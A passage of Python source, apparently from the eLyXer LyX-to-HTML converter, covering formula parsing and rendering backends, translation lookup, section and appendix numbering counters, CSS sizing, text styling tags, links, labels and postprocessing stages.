  def __unicode__(self):
    "Printable representation."
    return 'Whitespace: *' + self.original + '*'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class Bracket(FormulaBit):
  "A {} bracket inside a formula"
  start = FormulaConfig.starts['bracket']
  ending = FormulaConfig.endings['bracket']
  def __init__(self):
    "Create a (possibly literal) new bracket"
    FormulaBit.__init__(self)
    self.inner = None
  def detect(self, pos):
    "Detect the start of a bracket"
    return pos.checkfor(self.start)
  def parsebit(self, pos):
    "Parse the bracket"
    self.parsecomplete(pos, self.innerformula)
    return self
  def parsetext(self, pos):
    "Parse a text bracket"
    self.parsecomplete(pos, self.innertext)
    return self
  def parseliteral(self, pos):
    "Parse a literal bracket"
    self.parsecomplete(pos, self.innerliteral)
    return self
  def parsecomplete(self, pos, innerparser):
    "Parse the start and end marks"
    if not pos.checkfor(self.start):
      Trace.error('Bracket should start with ' + self.start + ' at ' + pos.identifier())
      return None
    self.skiporiginal(self.start, pos)
    # register the closing mark so the inner parser stops at it
    pos.pushending(self.ending)
    innerparser(pos)
    self.original += pos.popending(self.ending)
    self.computesize()
  def innerformula(self, pos):
    "Parse a whole formula inside the bracket"
    while not pos.finished():
      self.add(self.factory.parseany(pos))
  def innertext(self, pos):
    "Parse some text inside the bracket, following textual rules."
    # only these characters are parsed as formula constructs; the rest
    # pass through as plain constants
    specialchars = list(FormulaConfig.symbolfunctions.keys())
    specialchars.append(FormulaConfig.starts['command'])
    specialchars.append(FormulaConfig.starts['bracket'])
    specialchars.append(Comment.start)
    while not pos.finished():
      if pos.current() in specialchars:
        self.add(self.factory.parseany(pos))
        if pos.checkskip(' '):
          self.original += ' '
      else:
        self.add(FormulaConstant(pos.skipcurrent()))
  def innerliteral(self, pos):
    "Parse a literal inside the bracket, which does not generate HTML."
    self.literal = ''
    while not pos.finished() and not pos.current() == self.ending:
      if pos.current() == self.start:
        # nested literal bracket: recurse
        self.parseliteral(pos)
      else:
        self.literal += pos.skipcurrent()
    self.original += self.literal
class SquareBracket(Bracket):
  "A [] bracket inside a formula"
  start = FormulaConfig.starts['squarebracket']
  ending = FormulaConfig.endings['squarebracket']
  def clone(self):
    "Return a fresh square bracket that shares this one's contents."
    copy = SquareBracket()
    copy.contents = self.contents
    return copy
class MathsProcessor(object):
  "A processor for one maths construction inside the FormulaProcessor."
  def process(self, contents, index):
    "Process an element inside a formula; subclasses must override this."
    Trace.error('Unimplemented process() in ' + unicode(self))
  def __unicode__(self):
    "Return a printable description."
    return 'Maths processor ' + self.__class__.__name__
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class FormulaProcessor(object):
  "A processor specifically for formulas."
  # MathsProcessor instances; appended elsewhere during setup
  processors = []
  def process(self, bit):
    "Process the contents of every formula bit, recursively."
    self.processcontents(bit)
    self.processinsides(bit)
    self.traversewhole(bit)
  def processcontents(self, bit):
    "Process the contents of a formula bit, depth-first."
    if not isinstance(bit, FormulaBit):
      return
    bit.process()
    for element in bit.contents:
      self.processcontents(element)
  def processinsides(self, bit):
    "Process the insides (limits, brackets) in a formula bit."
    if not isinstance(bit, FormulaBit):
      return
    for index, element in enumerate(bit.contents):
      # each registered processor may rewrite contents at this index
      for processor in self.processors:
        processor.process(bit.contents, index)
      # continue with recursive processing
      self.processinsides(element)
  def traversewhole(self, formula):
    "Traverse over the contents to alter variables and space units."
    last = None
    for bit, contents in self.traverse(formula):
      if bit.type == 'alpha':
        self.italicize(bit, contents)
      elif bit.type == 'font' and last and last.type == 'number':
        # separate a number from a following font bit with a space
        bit.contents.insert(0, FormulaConstant(u' '))
      last = bit
  def traverse(self, bit):
    "Traverse a formula and yield a flattened structure of (bit, list) pairs."
    for element in bit.contents:
      if hasattr(element, 'type') and element.type:
        yield (element, bit.contents)
      elif isinstance(element, FormulaBit):
        for pair in self.traverse(element):
          yield pair
  def italicize(self, bit, contents):
    "Italicize the given bit of text in place within its contents list."
    index = contents.index(bit)
    contents[index] = TaggedBit().complete([bit], 'i')
class Formula(Container):
  "A LaTeX formula"
  def __init__(self):
    self.parser = FormulaParser()
    self.output = TaggedOutput().settag('span class="formula"')
  def process(self):
    "Convert the formula to tags, choosing the configured math backend."
    if self.header[0] == 'inline':
      DocumentParameters.displaymode = False
    else:
      DocumentParameters.displaymode = True
      self.output.settag('div class="formula"', True)
    # pick exactly one rendering backend, in priority order
    if Options.jsmath:
      self.jsmath()
    elif Options.mathjax:
      self.mathjax()
    elif Options.googlecharts:
      self.googlecharts()
    else:
      self.classic()
  def jsmath(self):
    "Make the contents for jsMath."
    if self.header[0] != 'inline':
      self.output = TaggedOutput().settag('div class="math"')
    else:
      self.output = TaggedOutput().settag('span class="math"')
    self.contents = [Constant(self.parsed)]
  def mathjax(self):
    "Make the contents for MathJax."
    self.output.tag = 'span class="MathJax_Preview"'
    tag = 'script type="math/tex'
    if self.header[0] != 'inline':
      tag += ';mode=display'
    self.contents = [TaggedText().constant(self.parsed, tag + '"', True)]
  def googlecharts(self):
    "Make the contents using Google Charts http://code.google.com/apis/chart/."
    url = FormulaConfig.urls['googlecharts'] + quote_plus(self.parsed)
    img = '<img class="chart" src="' + url + '" alt="' + self.parsed + '"/>'
    self.contents = [Constant(img)]
  def classic(self):
    "Make the contents using classic output generation with XHTML and CSS."
    whole = FormulaFactory().parseformula(self.parsed)
    FormulaProcessor().process(whole)
    whole.parent = self
    self.contents = [whole]
  def parse(self, pos):
    "Parse using a parse position instead of self.parser."
    # dispatch on the opening delimiter; $$ must be checked before $
    if pos.checkskip('$$'):
      self.parsedollarblock(pos)
    elif pos.checkskip('$'):
      self.parsedollarinline(pos)
    elif pos.checkskip('\\('):
      self.parseinlineto(pos, '\\)')
    elif pos.checkskip('\\['):
      self.parseblockto(pos, '\\]')
    else:
      pos.error('Unparseable formula')
    self.process()
    return self
  def parsedollarinline(self, pos):
    "Parse a $...$ formula."
    self.header = ['inline']
    self.parsedollar(pos)
  def parsedollarblock(self, pos):
    "Parse a $$...$$ formula."
    self.header = ['block']
    self.parsedollar(pos)
    if not pos.checkskip('$'):
      pos.error('Formula should be $$...$$, but last $ is missing.')
  def parsedollar(self, pos):
    "Parse to the next $."
    pos.pushending('$')
    self.parsed = pos.globexcluding('$')
    pos.popending('$')
  def parseinlineto(self, pos, limit):
    "Parse a \\(...\\) formula."
    self.header = ['inline']
    self.parseupto(pos, limit)
  def parseblockto(self, pos, limit):
    "Parse a \\[...\\] formula."
    self.header = ['block']
    self.parseupto(pos, limit)
  def parseupto(self, pos, limit):
    "Parse a formula that ends with the given command."
    pos.pushending(limit)
    self.parsed = pos.glob(lambda: True)
    pos.popending(limit)
  def __unicode__(self):
    "Return a printable representation."
    if self.partkey and self.partkey.number:
      return 'Formula (' + self.partkey.number + ')'
    return 'Unnumbered formula'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class WholeFormula(FormulaBit):
  "Parse a complete formula."
  def detect(self, pos):
    "Any remaining text counts: just check the position has not ended."
    return not pos.finished()
  def parsebit(self, pos):
    "Keep parsing formula bits until the position is exhausted."
    while not pos.finished():
      self.add(self.factory.parseany(pos))
class FormulaFactory(object):
  "Construct bits of formula"
  # bit types will be appended later
  types = [FormulaSymbol, RawText, FormulaNumber, Bracket, Comment, WhiteSpace]
  # types that are consumed but never produce visible output
  skippedtypes = [Comment, WhiteSpace]
  defining = False
  def __init__(self):
    "Initialize the map of instances."
    self.instances = dict()
  def detecttype(self, type, pos):
    "Detect a bit of a given type."
    if pos.finished():
      return False
    return self.instance(type).detect(pos)
  def instance(self, type):
    "Get a cached instance of the given type, creating it if needed."
    if not type in self.instances or not self.instances[type]:
      self.instances[type] = self.create(type)
    return self.instances[type]
  def create(self, type):
    "Create a new formula bit of the given type."
    return Cloner.create(type).setfactory(self)
  def clearskipped(self, pos):
    "Clear any skipped types."
    while not pos.finished():
      if not self.skipany(pos):
        return
    return
  def skipany(self, pos):
    "Skip any skipped types."
    for type in self.skippedtypes:
      if self.instance(type).detect(pos):
        return self.parsetype(type, pos)
    return None
  def parseany(self, pos):
    "Parse any formula bit at the current location."
    for type in self.types + self.skippedtypes:
      if self.detecttype(type, pos):
        return self.parsetype(type, pos)
    Trace.error('Unrecognized formula at ' + pos.identifier())
    return FormulaConstant(pos.skipcurrent())
  def parsetype(self, type, pos):
    "Parse the given type and return it."
    bit = self.instance(type)
    # consume the cached instance so the next request creates a fresh one
    self.instances[type] = None
    returnedbit = bit.parsebit(pos)
    if returnedbit:
      return returnedbit.setfactory(self)
    return bit
  def parseformula(self, formula):
    "Parse a string of text that contains a whole formula."
    pos = TextPosition(formula)
    whole = self.create(WholeFormula)
    if whole.detect(pos):
      whole.parsebit(pos)
      return whole
    # no formula found
    if not pos.finished():
      Trace.error('Unknown formula at: ' + pos.identifier())
      whole.add(TaggedBit().constant(formula, 'span class="unknown"'))
    return whole
class Translator(object):
  "Reads the configuration file and tries to find a translation."
  "Otherwise falls back to the messages in the config file."
  instance = None
  def translate(cls, key):
    "Get the translated message for a key."
    return cls.instance.getmessage(key)
  translate = classmethod(translate)
  def __init__(self):
    # gettext translation object; looked up lazily on first getmessage()
    self.translation = None
    self.first = True
  def findtranslation(self):
    "Find the translation for the document language."
    self.langcodes = None
    if not DocumentParameters.language:
      Trace.error('No language in document')
      return
    if not DocumentParameters.language in TranslationConfig.languages:
      Trace.error('Unknown language ' + DocumentParameters.language)
      return
    if TranslationConfig.languages[DocumentParameters.language] == 'en':
      # English is the default: the config messages are already English
      return
    langcodes = [TranslationConfig.languages[DocumentParameters.language]]
    try:
      self.translation = gettext.translation('elyxer', None, langcodes)
    except IOError:
      Trace.error('No translation for ' + unicode(langcodes))
  def getmessage(self, key):
    "Get the translated message for the given key."
    if self.first:
      self.findtranslation()
      self.first = False
    message = self.getuntranslated(key)
    if not self.translation:
      return message
    try:
      if sys.version_info >= (3, 0):
        # Bug fix: Python 3 gettext has no ugettext(); calling it raised an
        # uncaught AttributeError. gettext() already returns str on Python 3.
        message = self.translation.gettext(message)
      else:
        message = self.translation.ugettext(message)
    except IOError:
      pass
    return message
  def getuntranslated(self, key):
    "Get the untranslated message."
    if not key in TranslationConfig.constants:
      Trace.error('Cannot translate ' + key)
      return key
    return TranslationConfig.constants[key]
# singleton instance used by the classmethod translate()
Translator.instance = Translator()
class NumberCounter(object):
  "A counter for numbers (by default)."
  "The type can be changed to return letters, roman numbers..."
  name = None
  value = None
  mode = None
  master = None
  letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  symbols = NumberingConfig.sequence['symbols']
  romannumerals = [
    ('M', 1000), ('CM', 900), ('D', 500), ('CD', 400), ('C', 100),
    ('XC', 90), ('L', 50), ('XL', 40), ('X', 10), ('IX', 9), ('V', 5),
    ('IV', 4), ('I', 1)
  ]
  def __init__(self, name):
    "Give a name to the counter."
    self.name = name
  def setmode(self, mode):
    "Set the counter mode. Can be changed at runtime."
    self.mode = mode
    return self
  def init(self, value):
    "Set an initial value."
    self.value = value
  def gettext(self):
    "Get the current value as a text string."
    return unicode(self.value)
  def getletter(self):
    "Get the current value as a letter (A, B, C...)."
    return self.getsequence(self.letters)
  def getsymbol(self):
    "Get the current value as a symbol."
    return self.getsequence(self.symbols)
  def getsequence(self, sequence):
    "Get the current value from a sequence, wrapping around at the end."
    return sequence[(self.value - 1) % len(sequence)]
  def getroman(self):
    "Get the current value as a roman number."
    result = ''
    number = self.value
    for numeral, value in self.romannumerals:
      if number >= value:
        # Bug fix: use floor division; plain '/' is true division on Python 3,
        # and repeating a string a float number of times raises TypeError.
        result += numeral * (number // value)
        number = number % value
    return result
  def getvalue(self):
    "Get the current value as configured in the current mode."
    if not self.mode or self.mode in ['text', '1']:
      return self.gettext()
    if self.mode == 'A':
      return self.getletter()
    if self.mode == 'a':
      return self.getletter().lower()
    if self.mode == 'I':
      return self.getroman()
    if self.mode == '*':
      return self.getsymbol()
    Trace.error('Unknown counter mode ' + self.mode)
    return self.gettext()
  def getnext(self):
    "Increase the current value and get the next value as configured."
    if not self.value:
      self.value = 0
    self.value += 1
    return self.getvalue()
  def reset(self):
    "Reset the counter."
    self.value = 0
  def __unicode__(self):
    "Return a printable representation."
    result = 'Counter ' + self.name
    if self.mode:
      result += ' in mode ' + self.mode
    return result
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class DependentCounter(NumberCounter):
  "A counter that is subordinate to another counter (its master)."
  def setmaster(self, master):
    "Attach the master counter and remember its current value."
    self.master = master
    self.last = self.master.getvalue()
    return self
  def getnext(self):
    "Advance the counter, restarting whenever the master has moved on."
    if self.master.getvalue() != self.last:
      self.reset()
    value = NumberCounter.getnext(self)
    self.last = self.master.getvalue()
    return value
  def getvalue(self):
    "Get the combined value as master.dependent."
    return self.master.getvalue() + '.' + NumberCounter.getvalue(self)
class NumberGenerator(object):
  "A number generator for unique sequences and hierarchical structures. Used in:"
  " * ordered part numbers: Chapter 3, Section 5.3."
  " * unique part numbers: Footnote 15, Bibliography cite [15]."
  " * chaptered part numbers: Figure 3.15, Equation (8.3)."
  " * unique roman part numbers: Part I, Book IV."
  # singletons, assigned right after the class definitions below
  chaptered = None
  generator = None
  romanlayouts = [x.lower() for x in NumberingConfig.layouts['roman']]
  orderedlayouts = [x.lower() for x in NumberingConfig.layouts['ordered']]
  # shared class-level registry: counters persist across generator instances
  counters = dict()
  appendix = None
  def deasterisk(self, type):
    "Remove the possible asterisk in a layout type."
    return type.replace('*', '')
  def isunique(self, type):
    "Find out if the layout type corresponds to a unique part."
    return self.isroman(type)
  def isroman(self, type):
    "Find out if the layout type should have roman numeration."
    return self.deasterisk(type).lower() in self.romanlayouts
  def isinordered(self, type):
    "Find out if the layout type corresponds to an (un)ordered part."
    return self.deasterisk(type).lower() in self.orderedlayouts
  def isnumbered(self, type):
    "Find out if the type for a layout corresponds to a numbered layout."
    # asterisked layouts are never numbered; roman ones always are
    if '*' in type:
      return False
    if self.isroman(type):
      return True
    if not self.isinordered(type):
      return False
    if self.getlevel(type) > DocumentParameters.maxdepth:
      return False
    return True
  def isunordered(self, type):
    "Find out if the type contains an asterisk, basically."
    return '*' in type
  def getlevel(self, type):
    "Get the level that corresponds to a layout type."
    if self.isunique(type):
      return 0
    if not self.isinordered(type):
      Trace.error('Unknown layout type ' + type)
      return 0
    type = self.deasterisk(type).lower()
    level = self.orderedlayouts.index(type) + 1
    return level - DocumentParameters.startinglevel
  def getparttype(self, type):
    "Obtain the type for the part: without the asterisk, "
    "and switched to Appendix if necessary."
    if NumberGenerator.appendix and self.getlevel(type) == 1:
      return 'Appendix'
    return self.deasterisk(type)
  def generate(self, type):
    "Generate a number for a layout type."
    "Unique part types such as Part or Book generate roman numbers: Part I."
    "Ordered part types return dot-separated tuples: Chapter 5, Subsection 2.3.5."
    "Everything else generates unique numbers: Bibliography [1]."
    "Each invocation results in a new number."
    return self.getcounter(type).getnext()
  def getcounter(self, type):
    "Get (or lazily create) the counter for the given type."
    type = type.lower()
    if not type in self.counters:
      self.counters[type] = self.create(type)
    return self.counters[type]
  def create(self, type):
    "Create a counter for the given type."
    # nested numbered layouts depend on the counter one level above
    if self.isnumbered(type) and self.getlevel(type) > 1:
      index = self.orderedlayouts.index(type)
      above = self.orderedlayouts[index - 1]
      master = self.getcounter(above)
      return self.createdependent(type, master)
    counter = NumberCounter(type)
    if self.isroman(type):
      counter.setmode('I')
    return counter
  def getdependentcounter(self, type, master):
    "Get (or create) a counter of the given type that depends on another."
    if not type in self.counters or not self.counters[type].master:
      self.counters[type] = self.createdependent(type, master)
    return self.counters[type]
  def createdependent(self, type, master):
    "Create a dependent counter given the master."
    return DependentCounter(type).setmaster(master)
  def startappendix(self):
    "Start appendices here: switch the top-level counter to letters."
    firsttype = self.orderedlayouts[DocumentParameters.startinglevel]
    counter = self.getcounter(firsttype)
    counter.setmode('A').reset()
    NumberGenerator.appendix = True
class ChapteredGenerator(NumberGenerator):
  "Generate chaptered numbers, as in Chapter.Number."
  "Used in equations, figures: Equation (5.3), figure 8.15."
  def generate(self, type):
    "Generate a number which goes with first-level numbers (chapters). "
    "For the article classes a unique number is generated."
    if DocumentParameters.startinglevel > 0:
      # article-like classes have no chapters: fall back to unique numbers
      return NumberGenerator.generator.generate(type)
    chapter = self.getcounter('Chapter')
    return self.getdependentcounter(type, chapter).getnext()
# module-level singleton generators used throughout the numbering code
NumberGenerator.chaptered = ChapteredGenerator()
NumberGenerator.generator = NumberGenerator()
class ContainerSize(object):
  "The size of a container."
  # all dimensions are CSS strings like '45%' or '120px'; None means unset
  width = None
  height = None
  maxwidth = None
  maxheight = None
  scale = None
  def set(self, width = None, height = None):
    "Set the proper size with width and height."
    self.setvalue('width', width)
    self.setvalue('height', height)
    return self
  def setmax(self, maxwidth = None, maxheight = None):
    "Set max width and/or height."
    self.setvalue('maxwidth', maxwidth)
    self.setvalue('maxheight', maxheight)
    return self
  def readparameters(self, container):
    "Read some size parameters off a container."
    self.setparameter(container, 'width')
    self.setparameter(container, 'height')
    self.setparameter(container, 'scale')
    self.checkvalidheight(container)
    return self
  def setparameter(self, container, name):
    "Read a size parameter off a container, and set it if present."
    value = container.getparameter(name)
    self.setvalue(name, value)
  def setvalue(self, name, value):
    "Set the value of a parameter name, only if it's valid."
    value = self.processparameter(value)
    if value:
      setattr(self, name, value)
  def checkvalidheight(self, container):
    "Check if the height parameter is valid; otherwise erase it."
    heightspecial = container.getparameter('height_special')
    # a height of '1 totalheight' is the LyX default, not a real constraint
    if self.height and self.extractnumber(self.height) == '1' and heightspecial == 'totalheight':
      self.height = None
  def processparameter(self, value):
    "Do the full processing on a parameter."
    if not value:
      return None
    if self.extractnumber(value) == '0':
      return None
    for ignored in StyleConfig.size['ignoredtexts']:
      if ignored in value:
        value = value.replace(ignored, '')
    return value
  def extractnumber(self, text):
    "Extract the leading (possibly decimal) number in the given text."
    result = ''
    decimal = False
    for char in text:
      if char.isdigit():
        result += char
      elif char == '.' and not decimal:
        # accept at most one decimal point
        result += char
        decimal = True
      else:
        return result
    return result
  def checkimage(self, width, height):
    "Check image dimensions, set them if possible."
    if width:
      self.maxwidth = unicode(width) + 'px'
      if self.scale and not self.width:
        self.width = self.scalevalue(width)
    if height:
      self.maxheight = unicode(height) + 'px'
      if self.scale and not self.height:
        self.height = self.scalevalue(height)
    # with only one dimension set, let the browser compute the other
    if self.width and not self.height:
      self.height = 'auto'
    if self.height and not self.width:
      self.width = 'auto'
  def scalevalue(self, value):
    "Scale the value according to the image scale and return it as unicode."
    # result is truncated to whole pixels
    scaled = value * int(self.scale) / 100
    return unicode(int(scaled)) + 'px'
  def removepercentwidth(self):
    "Remove percent width if present, to set it at the figure level."
    if not self.width:
      return None
    if not '%' in self.width:
      return None
    width = self.width
    self.width = None
    if self.height == 'auto':
      self.height = None
    return width
  def addstyle(self, container):
    "Add the proper style attribute to the output tag."
    if not isinstance(container.output, TaggedOutput):
      Trace.error('No tag to add style, in ' + unicode(container))
    if not self.width and not self.height and not self.maxwidth and not self.maxheight:
      # nothing to see here; move along
      return
    tag = ' style="'
    tag += self.styleparameter('width')
    tag += self.styleparameter('maxwidth')
    tag += self.styleparameter('height')
    tag += self.styleparameter('maxheight')
    # drop the trailing space left by the last parameter
    if tag[-1] == ' ':
      tag = tag[:-1]
    tag += '"'
    container.output.tag += tag
  def styleparameter(self, name):
    "Get the style for a single parameter."
    value = getattr(self, name)
    if value:
      return name.replace('max', 'max-') + ': ' + value + '; '
    return ''
class QuoteContainer(Container):
  "A container that renders a pretty quote."
  def __init__(self):
    self.parser = BoundedParser()
    self.output = FixedOutput()
  def process(self):
    "Map the quote type to its configured HTML replacement."
    self.type = self.header[2]
    if self.type in StyleConfig.quotes:
      self.html = [StyleConfig.quotes[self.type]]
      return
    Trace.error('Quote type ' + self.type + ' not found')
    self.html = ['"']
class LyXLine(Container):
  "A horizontal line produced by LyX."
  def __init__(self):
    self.parser = LoneCommand()
    self.output = FixedOutput()
  def process(self):
    "Emit a fixed horizontal rule."
    self.html = ['<hr class="line" />']
class EmphaticText(TaggedText):
  "Text rendered in emphatic (italic) mode."
  def process(self):
    "Wrap the contents in an <i> tag."
    self.output.tag = 'i'
class ShapedText(TaggedText):
  "Text with a shape applied (italic, slanted...)."
  def process(self):
    "Look up the tag that corresponds to the requested shape."
    self.type = self.header[1]
    if self.type in TagConfig.shaped:
      self.output.tag = TagConfig.shaped[self.type]
      return
    Trace.error('Unrecognized shape ' + self.header[1])
    self.output.tag = 'span'
class VersalitasText(TaggedText):
  "Text rendered in small caps (versalitas)."
  def process(self):
    "Use a span carrying the versalitas class."
    self.output.tag = 'span class="versalitas"'
class ColorText(TaggedText):
  "Text rendered in a given color."
  def process(self):
    "Use a span whose class is the color name."
    self.color = self.header[1]
    self.output.tag = 'span class="%s"' % self.color
class SizeText(TaggedText):
  "Text rendered at a given size."
  def process(self):
    "Use a span whose class is the size name."
    self.size = self.header[1]
    self.output.tag = 'span class="%s"' % self.size
class BoldText(TaggedText):
  "Text in boldface."
  def process(self):
    "Wrap the contents in a <b> tag."
    self.output.tag = 'b'
class TextFamily(TaggedText):
  "A bit of text from a different typeface family."
  def process(self):
    "Parse the family type and map it to its configured tag."
    self.type = self.header[1]
    if not self.type in TagConfig.family:
      # Bug fix: the error message concatenated the builtin 'type' (a class
      # object), which raised TypeError; report self.type instead.
      Trace.error('Unrecognized family ' + self.type)
      self.output.tag = 'span'
      return
    self.output.tag = TagConfig.family[self.type]
class Hfill(TaggedText):
  "A horizontal fill."
  def process(self):
    "Use a span carrying the hfill class."
    self.output.tag = 'span class="hfill"'
class BarredText(TaggedText):
  "Text decorated with a bar somewhere."
  def process(self):
    "Look up the tag that corresponds to the requested bar type."
    self.type = self.header[1]
    if self.type in TagConfig.barred:
      self.output.tag = TagConfig.barred[self.type]
      return
    Trace.error('Unknown bar type ' + self.type)
    self.output.tag = 'span'
class LangLine(TaggedText):
  "A line carrying language information."
  def process(self):
    "Generate a span with lang info only when the language is recognized."
    lang = self.header[1]
    if lang in TranslationConfig.languages:
      isolang = TranslationConfig.languages[lang]
      self.output = TaggedOutput().settag('span lang="' + isolang + '"', False)
    else:
      self.output = ContentsOutput()
class InsetLength(BlackBox):
  "A length measure inside an inset."
  def process(self):
    # the length value comes verbatim from the inset header
    self.length = self.header[1]
class Space(Container):
  "A horizontal space of one of several types."
  def __init__(self):
    self.parser = InsetParser()
    self.output = FixedOutput()
  def process(self):
    "Map the space type to HTML, adding a styled span for explicit lengths."
    self.type = self.header[2]
    if self.type not in StyleConfig.hspaces:
      Trace.error('Unknown space type ' + self.type)
      self.html = [' ']
      return
    self.html = [StyleConfig.hspaces[self.type]]
    length = self.getlength()
    if not length:
      return
    self.output = TaggedOutput().settag('span class="hspace"', False)
    ContainerSize().set(length).addstyle(self)
  def getlength(self):
    "Get the space length from the contents, if an InsetLength is present."
    if self.contents and isinstance(self.contents[0], InsetLength):
      return self.contents[0].length
    return None
class VerticalSpace(Container):
  "An inset containing a vertical space."
  def __init__(self):
    self.parser = InsetParser()
    self.output = FixedOutput()
  def process(self):
    "Emit either a known vspace or a div with an explicit height."
    self.type = self.header[2]
    if self.type in StyleConfig.vspaces:
      self.html = [StyleConfig.vspaces[self.type]]
      return
    tag = 'div class="vspace" style="height: ' + self.type + ';"'
    self.output = TaggedOutput().settag(tag, True)
class Align(Container):
  "A block of aligned text."
  def __init__(self):
    self.parser = ExcludingParser()
    self.output = TaggedOutput().setbreaklines(True)
  def process(self):
    "Use a div whose class is the alignment name."
    self.output.tag = 'div class="' + self.header[1] + '"'
class Newline(Container):
  "A line break."
  def __init__(self):
    self.parser = LoneCommand()
    self.output = FixedOutput()
  def process(self):
    "Emit a fixed <br/> tag."
    self.html = ['<br/>\n']
class NewPage(Newline):
  "A page break."
  def process(self):
    "Emit a paragraph containing just a line break."
    self.html = ['<p><br/>\n</p>\n']
class Separator(Container):
  "A separator string which is not extracted by extracttext()."
  def __init__(self, constant):
    "Store the constant as fixed HTML, with no extractable contents."
    self.output = FixedOutput()
    self.contents = []
    self.html = [constant]
class StrikeOut(TaggedText):
  "Text struck out."
  def process(self):
    "Wrap the contents in a <strike> tag."
    self.output.tag = 'strike'
class StartAppendix(BlackBox):
  "Mark to start an appendix here."
  "From this point on, all chapters become appendices."
  def process(self):
    "Activate the special numbering scheme for appendices, using letters."
    # delegates to the shared generator; affects all subsequent chapters
    NumberGenerator.generator.startappendix()
class Link(Container):
  "A link to another part of the document"
  # anchor name for this link, when it acts as a destination
  anchor = None
  # URL this link points to
  url = None
  # CSS class / semantic type of the link
  type = None
  # page (output file) the destination lives in, for split output
  page = None
  # HTML target attribute (e.g. _blank), taken from Options
  target = None
  # another Link object this one points to
  destination = None
  # HTML title attribute (tooltip)
  title = None
  def __init__(self):
    "Initialize the link, add target if configured."
    self.contents = []
    self.parser = InsetParser()
    self.output = LinkOutput()
    if Options.target:
      self.target = Options.target
  def complete(self, text, anchor = None, url = None, type = None, title = None):
    "Complete the link with text and any of anchor, URL, type, title."
    self.contents = [Constant(text)]
    if anchor:
      self.anchor = anchor
    if url:
      self.url = url
    if type:
      self.type = type
    if title:
      self.title = title
    return self
  def computedestination(self):
    "Use the destination link to fill in the destination URL."
    if not self.destination:
      return
    self.url = ''
    if self.destination.anchor:
      self.url = '#' + self.destination.anchor
    if self.destination.page:
      # prefix the page so the anchor resolves across split output files
      self.url = self.destination.page + self.url
  def setmutualdestination(self, destination):
    "Set another link as destination, and set its destination to this one."
    self.destination = destination
    destination.destination = self
  def __unicode__(self):
    "Return a printable representation."
    result = 'Link'
    if self.anchor:
      result += ' #' + self.anchor
    if self.url:
      result += ' to ' + self.url
    return result
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class URL(Link):
  "A clickable URL."
  def process(self):
    "Build the URL and the link text from the inset parameters."
    target = self.escape(self.getparameter('target'))
    kind = self.getparameter('type')
    if kind:
      self.url = self.escape(kind) + target
    else:
      self.url = target
    name = self.getparameter('name')
    if not name:
      name = target
    self.contents = [Constant(name)]
class FlexURL(URL):
  "A flexible URL."
  def process(self):
    "Read the URL from the extracted text of the contents."
    self.url = self.extracttext()
class LinkOutput(ContainerOutput):
  "Output for a link pointing to some destination, or for an anchor."
  def gethtml(self, link):
    "Build the <a> tag for the link and delegate the HTML generation to it."
    linktype = link.__class__.__name__
    if link.type:
      linktype = link.type
    tag = 'a class="' + linktype + '"'
    if link.anchor:
      tag += ' name="' + link.anchor + '"'
    # resolve the URL from the destination link before emitting href
    if link.destination:
      link.computedestination()
    for attribute, value in [
        ('href', link.url), ('target', link.target), ('title', link.title)]:
      if value:
        tag += ' ' + attribute + '="' + value + '"'
    return TaggedOutput().settag(tag).gethtml(link)
class Postprocessor(object):
  "Postprocess a container keeping some context"
  # stage classes registered by other modules; instantiated per postprocessor
  stages = []
  def __init__(self):
    self.stages = StageDict(Postprocessor.stages, self)
    self.current = None
    self.last = None
  def postprocess(self, next):
    "Postprocess a container and its contents."
    # operates as a one-element pipeline: 'next' goes in, the processed
    # previous element comes out; pass None to flush
    self.postrecursive(self.current)
    result = self.postcurrent(next)
    self.last = self.current
    self.current = next
    return result
  def postrecursive(self, container):
    "Postprocess the container contents recursively"
    if not hasattr(container, 'contents'):
      return
    if len(container.contents) == 0:
      return
    if hasattr(container, 'postprocess'):
      # a falsy postprocess attribute opts the container out entirely
      if not container.postprocess:
        return
    postprocessor = Postprocessor()
    contents = []
    for element in container.contents:
      post = postprocessor.postprocess(element)
      if post:
        contents.append(post)
    # two rounds to empty the pipeline
    for i in range(2):
      post = postprocessor.postprocess(None)
      if post:
        contents.append(post)
    container.contents = contents
  def postcurrent(self, next):
    "Postprocess the current element taking into account next and last."
    stage = self.stages.getstage(self.current)
    if not stage:
      return self.current
    return stage.postprocess(self.last, self.current, next)
class StageDict(object):
  "A dictionary of postprocessing stages keyed by the class they process."
  def __init__(self, classes, postprocessor):
    "Instantiate one stage per class and index them by processed class."
    instances = self.instantiate(classes, postprocessor)
    self.stagedict = dict((stage.processedclass, stage) for stage in instances)
  def instantiate(self, classes, postprocessor):
    "Create one stage instance per class, wiring in the postprocessor."
    stages = []
    for stageclass in classes:
      stage = stageclass.__new__(stageclass)
      stage.__init__()
      stage.postprocessor = postprocessor
      stages.append(stage)
    return stages
  def getstage(self, element):
    "Get the stage for a given element, or None if its class has no stage."
    return self.stagedict.get(element.__class__)
class Label(Link):
  "A label to be referenced"
  # registry of all labels seen so far, keyed by label name
  names = dict()
  # latest numbered layout, maintained elsewhere
  lastlayout = None
  def __init__(self):
    Link.__init__(self)
    self.lastnumbered = None
  def process(self):
    "Process a label container."
    key = self.getparameter('name')
    self.create(' ', key)
    # remember which layout was current when this label appeared
    self.lastnumbered = Label.lastlayout
  def create(self, text, key, type = 'Label'):
    "Create the label for a given key."
    self.key = key
    self.complete(text, anchor = key, type = type)
    Label.names[key] = self
    # resolve any forward references that were waiting for this key
    if key in Reference.references:
      for reference in Reference.references[key]:
        reference.destination = self
    return self
  def findpartkey(self):
    "Get the part key for the latest numbered container seen."
    numbered = self.numbered(self)
    if numbered and numbered.partkey:
      return numbered.partkey
    return ''
  def numbered(self, container):
    "Get the numbered container for the label, walking up the parents."
    if container.partkey:
      return container
    if not container.parent:
      # reached the root: fall back to the last numbered layout, if any
      if self.lastnumbered:
        return self.lastnumbered
      return None
    return self.numbered(container.parent)
  def __unicode__(self):
    "Return a printable representation."
    if not hasattr(self, 'key'):
      return 'Unnamed label'
    return 'Label ' + self.key
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class Reference(Link):
  "A reference to a label."
  # registry of references by key, used to resolve forward references
  references = dict()
  key = 'none'
  def process(self):
    "Read the reference and set the arrow."
    self.key = self.getparameter('reference')
    if self.key in Label.names:
